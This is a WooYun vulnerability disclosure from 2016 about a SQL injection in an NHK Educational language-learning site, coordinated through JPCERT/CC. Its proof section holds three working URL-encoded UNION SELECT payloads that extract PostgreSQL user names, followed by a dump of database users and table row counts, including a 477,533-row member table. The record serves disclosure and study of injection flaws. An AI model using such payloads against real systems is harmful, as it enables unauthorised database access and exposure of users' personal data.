漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0184973
漏洞标题:株式会社NHK SQL injection 477533 member 漏れ
相关厂商:NHK教育公司
漏洞作者: 路人甲
提交时间:2016-03-15 16:21
修复时间:2016-05-02 16:18
公开时间:2016-05-02 16:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-28: 细节向核心白帽子及相关领域专家公开
2016-04-07: 细节向普通白帽子公开
2016-04-17: 细节向实习白帽子公开
2016-05-02: 细节向公众公开
简要描述:
株式会社NHKエデュケーショナルは、NHK(日本放送協会)から委託を受けて、NHK語学番組のすべての番組を制作しています。
株式会社NHKエデュケーショナルは、平成元年に創立したNHKの関連会社で、語学番組をはじめとする、教育テレビの放送番組を年間8,000本以上を制作するほか、番組の映像商品の制作や関連イベントを開催するなど、放送以外のサービスを提供しています。
株式会社NHK SQL injection 477533 member 漏れ
详细说明:
SQL injection URL:http://**.**.**.**/review/detail.php?program=r_french&id=209
漏洞证明:
URL1:http://**.**.**.**/review/detail.php?program=-5692%27%20UNION%20ALL%20SELECT%20NULL,%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29,%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%200%20LIMIT%201%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&id=209
URL2:http://**.**.**.**/review/detail.php?program=-4795%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29%2C%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%201%20LIMIT%201%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-&id=209
URL3:http://**.**.**.**/review/detail.php?program=-5451%27%20UNION%20ALL%20SELECT%20NULL,%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29,%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%202%20LIMIT%201%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&id=209
database management system users [3]:
[*] gogakuru_sqluser
[*] nhke01
[*] postgres
Database: public
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| t_myphrase | 8050885 |
| t_test_log | 2927319 |
| t_member_genre | 2239507 |
| t_mycollection_rel | 1869152 |
| t_like_diary | 1684773 |
| t_tagging | 1502858 |
| t_learning_comment | 782505 |
| t_learning_record | 739961 |
| t_learning_diary | 615168 |
| t_sum_phrase_tag_count | 493435 |
| t_member | 477533 |
| t_statistics_monthly | 367814 |
| t_member_dump_20130401 | 338889 |
| t_popular_tag | 336966 |
| t_tag_phrase_count | 321030 |
| t_learning_goal | 294307 |
| t_dictation_result | 199794 |
| t_last_mycollection_update_ts | 197620 |
| t_statistics_daily | 183765 |
| t_ranking_mycollection_total | 149809 |
| t_ranking_mycollection_update_ts | 149809 |
| t_mycollection_category | 124358 |
| t_learning_goal_record | 119361 |
| t_yakunitatta | 112543 |
| t_mycollection | 95571 |
| t_sum_mycollection_bm_count_log | 82397 |
| yourphrase_vote_log | 79444 |
| t_mycollection_bookmark | 73971 |
| t_tag_daily_count | 64714 |
| t_sum_tag_count | 49557 |
| t_tag | 48189 |
| t_tweet_phrase | 40283 |
| access_log | 40217 |
| my_link | 39736 |
| pr_count | 38298 |
| t_tag_count | 31413 |
| t_phrase | 27503 |
| t_sum_myphrase_count | 27361 |
| t_session_info | 27299 |
| t_subscribe | 26821 |
| t_manavino_log | 25800 |
| t_session | 24830 |
| my_present_apply | 20511 |
| t_profile_log | 16167 |
| my_workbook | 15972 |
| t_notreach | 15444 |
| t_tweet_testmycollection_history | 14791 |
| t_questionnaire | 10059 |
| t_dictation_phrase | 8715 |
| t_sum_mycollection_bm_count_total | 6628 |
| check_answer | 3858 |
| enquete_20080428 | 3388 |
| t_filling_quiz_history | 3339 |
| enquete_nbk | 3035 |
| enquete_20070725 | 2125 |
| t_enquete_20150330 | 2077 |
| review_2008 | 1859 |
| ms_chinese | 1718 |
| ms_object | 1718 |
| enquete_20071221 | 1698 |
| rel_object | 1693 |
| yourphrase | 1519 |
| present_apply | 981 |
| t_news | 957 |
| travel_phrase | 910 |
| review_2009 | 832 |
| shopping_phrase | 802 |
| inquiry | 795 |
| review | 736 |
| t_recommend_phraseset | 644 |
| t_tweet_testmycollection | 463 |
| t_filling_quiz | 450 |
| t_program_genre | 427 |
| tsubo_learning | 396 |
| urchin_log | 365 |
| t_tag_mig | 339 |
| t_block_member | 301 |
| t_ranking_mycollection_weekly | 265 |
| tsubo_info | 251 |
| event_apply | 250 |
| review_2010 | 250 |
| review_2010_20140526 | 250 |
| movie | 247 |
| enquete_20071220 | 236 |
| t_program | 236 |
| t_recommend_diary | 224 |
| charo_museum | 200 |
| t_learning_diary_20130717 | 186 |
| charo | 126 |
| anne_message | 101 |
| charo_movie | 92 |
| t_learning_diary_20130717_main | 81 |
| toukou | 75 |
| topics | 69 |
| program_2009 | 46 |
| administrator | 45 |
| message | 42 |
| program_2008 | 42 |
| question | 42 |
| present | 39 |
| top_information | 37 |
| program | 33 |
| pr | 29 |
| anne | 24 |
| my_present | 24 |
| t_learning_diary_top | 24 |
| program_2010 | 16 |
| t_admin | 14 |
| workbook | 12 |
| calender_quiz | 11 |
| check_question | 9 |
| cm | 5 |
| thema | 2 |
+-----------------------------------+---------+
修复方案:
パラメパラメフィルター濾過
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2016-03-18 16:18
厂商回复:
最新状态:
2016-03-18:Hello 路人甲.This is JPCERT/CC.Thank you for your information.We will notify this information to the site administrator.